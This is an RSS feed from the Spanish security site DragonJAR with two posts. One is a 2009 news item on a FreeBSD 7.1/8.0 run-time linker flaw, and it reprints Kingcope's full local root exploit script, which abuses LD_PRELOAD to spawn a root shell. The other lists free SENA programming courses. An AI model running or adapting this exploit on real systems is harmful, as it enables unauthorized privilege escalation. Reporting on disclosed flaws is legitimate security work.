<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; variables</title> <atom:link href="http://www.dragonjar.org/tag/variables/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Fallo en FreeBSD permite obtener root</title><link>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml</link> <comments>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml#comments</comments> <pubDate>Tue, 01 Dec 2009 08:54:39 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Noticias Seguridad]]></category> <category><![CDATA[Pentest]]></category> <category><![CDATA[BSD]]></category> <category><![CDATA[FreeBSD]]></category> <category><![CDATA[sistema]]></category> <category><![CDATA[variables]]></category> <category><![CDATA[Vulnerabilidad]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3442</guid> <description><![CDATA[Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo. El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica [...]]]></description> <content:encoded><![CDATA[<p>Acaba de hacerse publica una <a
href="http://www.dragonjar.org/tag/vulnerabilidad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Vulnerabilidad">vulnerabilidad</a> descubierta por Nikolaos Rangos en los sistemas <a
href="http://www.dragonjar.org/tag/freebsd" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con FreeBSD">FreeBSD</a> que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este <a
href="http://www.dragonjar.org/tag/sistema" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sistema">sistema</a> operativo.</p><p
style="text-align: center;"><img
class="alignnone" title="Bug en FreeBSD" src="http://imgur.com/HNx9D.jpg" alt="HNx9D Fallo en FreeBSD permite obtener root" width="200" height="223" /></p><p>El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite <a
href="http://www.dragonjar.org/tag/variables" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con variables">variables</a> de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte <a
href="http://www.dragonjar.org/tag/variables" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con variables">variables</a> LD, incluso en los binarios setugid.<span
id="more-3442"></span><br
/> VERSIONES DE FREEBSD AFECTADAS<br
/> **********************************<br
/> FreeBSD 8.0-RELEASE *** VULNERABLE<br
/> FreeBSD 7.1-RELEASE *** VULNERABLE<br
/> FreeBSD 6.3-RELEASE *** NO VULNERABLE<br
/> FreeBSD 4.9-RELEASE *** NO VULNERABLE</p><p>Para más detalles ver el exploit.</p><p><code>#!/bin/sh<br
/> echo ** FreeBSD local r00t zeroday<br
/> echo by Kingcope<br
/> echo November 2009<br
/> cat &gt; env.c &lt;&lt; _EOF<br
/> #include </code></p><p><code>main() {<br
/> extern char **environ;<br
/> environ = (char**)malloc(8096);</code></p><p><code>environ[0] = (char*)malloc(1024);<br
/> environ[1] = (char*)malloc(1024);<br
/> strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");</code></p><p><code>execl("/sbin/ping", "ping", 0);<br
/> }<br
/> _EOF<br
/> gcc env.c -o env<br
/> cat &gt; program.c &lt;&lt; _EOF<br
/> #include<br
/> #include<br
/> #include<br
/> #include</code></p><p><code>void _init() {<br
/> extern char **environ;<br
/> environ=NULL;<br
/> system("echo ALEX-ALEX;/bin/sh");<br
/> }<br
/> _EOF</code></p><p>Para compilar y ejecutar</p><p><code>gcc -o program.o -c program.c -fPIC<br
/> gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles<br
/> cp w00t.so.1.0 /tmp/w00t.so.1.0<br
/> ./env</code></p><p>Mas Información en el <a
href="http://seclists.org/fulldisclosure/2009/Nov/371">Full Disclosure publicado por Nikolaos Rangos</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/parchear-problema-de-seguridad-de-safari-en-iphone-ipod-touch-e-ipad.xhtml" title="Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad">Parchear problema de seguridad de Safari en iPhone, iPod Touch e iPad</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-en-routers-thomson-a-fondo.xhtml" title="Vulnerabilidad en Routers Thomson a Fondo">Vulnerabilidad en Routers Thomson a Fondo</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml" title="Revisa la seguridad de tu sitio web Gratis">Revisa la seguridad de tu sitio web Gratis</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/fallo-en-freebsd-permite-obtener-root-desde-cuenta.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>cursos de programacion gratuitos en el sena virtual</title><link>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml</link> <comments>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml#comments</comments> <pubDate>Sat, 20 Dec 2008 18:08:28 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[aplicaciones]]></category> <category><![CDATA[Aprendizaje]]></category> <category><![CDATA[beca]]></category> <category><![CDATA[becas]]></category> <category><![CDATA[calidad de software]]></category> <category><![CDATA[Curso]]></category> <category><![CDATA[Cursos]]></category> <category><![CDATA[cursos virtuales]]></category> <category><![CDATA[Diseño]]></category> <category><![CDATA[excepciones en java]]></category> <category><![CDATA[JAVA]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[microsoft access 2000]]></category> <category><![CDATA[Nacional]]></category> <category><![CDATA[plus]]></category> <category><![CDATA[plus sofia]]></category> <category><![CDATA[Programación]]></category> <category><![CDATA[sen a]]></category> <category><![CDATA[SENA]]></category> <category><![CDATA[sena plus]]></category> <category><![CDATA[sena sofia]]></category> <category><![CDATA[sena sofia plus]]></category> <category><![CDATA[sena virtualç]]></category> <category><![CDATA[senavirtual]]></category> <category><![CDATA[sofia]]></category> <category><![CDATA[sofia plus]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[variables]]></category> <category><![CDATA[Virtual]]></category> <category><![CDATA[virtual sena]]></category> <category><![CDATA[www.senavirtual.edu.co]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1672</guid> <description><![CDATA[cursos de programacion hay muchos, pero ninguno como los cursos de programacion gratuitos que hace el sena virtual. El SENA (Servicio Nacional de Aprendizaje), en su página www.senavirtual.edu.co o en su plataforma sena sofia plus está implementando nuevos cursos programacion virtuales, entre las temáticas de estos cursos de programacion encontramos lenguajes como JAVA, C++, modelado de [...]]]></description> <content:encoded><![CDATA[<p><strong><a
href="http://www.dragonjar.org/tag/cursos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Cursos">cursos</a> de programacion</strong> hay muchos, pero ninguno como los <em>cursos de programacion</em> gratuitos que hace el <a
href="http://www.dragonjar.org/tag/sena" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SENA">sena</a> virtual.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://img355.imageshack.us/img355/6241/sinttulo2cz9.jpg" alt="sinttulo2cz9 cursos de programacion gratuitos en el sena virtual"  title="cursos de programacion gratuitos en el sena virtual" /></p><p>El SENA (Servicio <a
href="http://www.dragonjar.org/tag/nacional" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Nacional">Nacional</a> de <a
href="http://www.dragonjar.org/tag/aprendizaje" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Aprendizaje">Aprendizaje</a>), en su página <a
href="http://www.dragonjar.org/tag/wwwsenavirtualeduco" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con www.senavirtual.edu.co">www.senavirtual.edu.co</a> o en su plataforma <strong><a
href="http://www.dragonjar.org/tag/sena-sofia" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sena sofia">sena sofia</a> plus</strong> está implementando nuevos cursos programacion virtuales, entre las temáticas de estos cursos de programacion encontramos lenguajes como <a
href="http://www.dragonjar.org/tag/java" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con JAVA">JAVA</a>, C++, modelado de datos y calidad de software.</p><p>Recordemos que al terminar los cursos de programacion en el sena virtual te dan un certificado del sena y entras automáticamente en la bolsa de empleo del SENA donde podrás ser llamado para trabajar en prestigiosas empresas del sector tecnológico del país.</p><p>El listado de cursos de programacion que puedes realizar en el senavirtual es el siguiente:<br
/> <span
id="more-1672"></span></p><p><script type="text/javascript">// <![CDATA[
        google_ad_client = "pub-5474472965666825"; /* DJAR - Sena Enlaces */ google_ad_slot = "3038482239"; google_ad_width = 200; google_ad_height = 90;
// ]]&gt;</script><br
/><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script><br
/> <br
/> <strong><span
style="text-decoration: underline;"><span
style="color: #000000;"><strong>Cursos de Programacion - </strong>Programación Orientada A Objetos</span></span></strong> <span
style="color: #0000ff;"><br
/> Variables y estructuras de Control en la Programación orientada a objetos: Java<br
/> Desarrollo de aplicaciones con Interfaz Gráfica, Manejo de Eventos, Clases y Objetos : Java<br
/> Desarrollo de Aplicaciones con Manejo de Datos en la Memoria- Java<br
/> Desarrollo de Aplicaciones con Manejo de Archivos de Texto y el Manejo de Excepciones en JAVA<br
/> Desarrollo de Aplicaciones con Manejo de Proceso Simultaneo y Uso de Menús: Java<br
/> Desarrollo de Applets/Aplicaciones con Uso de Base de Datos, Redes, Servlets y Multimedia<br
/> Estructura del Lenguaje de Programación c++ ( Nivel I del cursos de programacion)<br
/> Módulos, estructura de almacenamiento y POO utilizando el lenguaje de programación C++ ( Nivel II)<br
/> Uso de clases, objetos, métodos y archivos secuenciales en POO con lenguaje de programación C++ ( Nivel III)<br
/></span><script type="text/javascript">// <![CDATA[
        google_ad_client = "pub-5474472965666825"; /* DJAR - Sena Enlaces */ google_ad_slot = "3038482239"; google_ad_width = 200; google_ad_height = 90;
// ]]&gt;</script><br
/><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script><br
/> <br
/> <strong><span
style="text-decoration: underline;"><span
style="color: #000000;">cursos de programacion - Modelado De Datos</span></span></strong><br
/> <span
class="Apple-style-span" style="color: #0000ff;">Informática: Administración de bases de datos utilizando Microsoft® Access 2000</span><br
/> <span
style="color: #0000ff;"> Informática: <a
href="http://www.dragonjar.org/tag/diseno" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Diseño">Diseño</a> de bases de datos en <a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">SQL</a><br
/> Metodología de la Programación de Sistemas Informáticos<br
/> Estructuras de datos Lineales<br
/> Estructuras de datos No Lineales<br
/> Modelación de Sistemas &#8211; Modelación<br
/> Modelación de Sistemas &#8211; Simulación<br
/> Base de datos: Conceptuación y sistemas de Administración<br
/> Diseño de Casos de Uso<br
/> Metodologías de Análisis y Diseño de Sistemas-de la incepción al diseño de la arquitectura<br
/> Metodologías de Análisis y Diseño de Sistemas-del diseño a la implementación<br
/> Principios del análisis y diseño orientado a objetos, utilizando el estándar UML<br
/> Aplicación metodología orientada a objetos utilizando el estándar UML</span></p><p><span
style="color: #0000ff;">Para acceder a estos <a
href="http://www.dragonjar.org/cursos-virtuales-gratis-en-el-sena.xhtml">cursos de programacion</a> gratuitos del SENA solo tienes que entrar al enlace de los <a
href="http://anonym-url.com/go.php?to=http://sis.senavirtual.edu.co/oferta.php?areaid=10">cursos de programacion</a> en el sena virtual.</span></p><p
align="center"><iframe
src="http://www.youtube.com/embed/43QnhMXDDfI" frameborder="0" width="580" height="465"></iframe></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/cursos-virtuales-gratis-en-el-sena.xhtml" title="www.senavirtual.edu.co – Cursos virtuales GRATIS en el Sena">www.senavirtual.edu.co – Cursos virtuales GRATIS en el Sena</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-de-seguridad-y-redes-en-el-sena-virtual.xhtml" title="Curso Gratis de Seguridad y Redes en el Sena Virtual">Curso Gratis de Seguridad y Redes en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/cupos-disponibles-en-el-sena.xhtml" title="Cupos disponibles en el SENA">Cupos disponibles en el SENA</a></li><li><a
href="http://www.dragonjar.org/curso-en-el-sena-virtual-sobre-auditoria-en-seguridad.xhtml" title="Curso en el Sena Virtual sobre Auditoria en Seguridad">Curso en el Sena Virtual sobre Auditoria en Seguridad</a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-informatica-en-el-sena-virtual.xhtml" title="Sena Virtual Cursos Gratis de Informática">Sena Virtual Cursos Gratis de Informática</a></li><li><a
href="http://www.dragonjar.org/curso-gratuito-de-ingles-con-el-sena-virtual.xhtml" title="Curso Gratuito de Ingles con el Sena Virtual">Curso Gratuito de Ingles con el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/sena-sofia-plus.xhtml" title="SENA Sofia Plus">SENA Sofia Plus</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/cursos-gratuitos-de-programacion-sena-virtual.xhtml/feed</wfw:commentRss> <slash:comments>101</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 9/64 queries in 0.044 seconds using disk: basic
Object Caching 1269/1367 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 21:02:45 -->
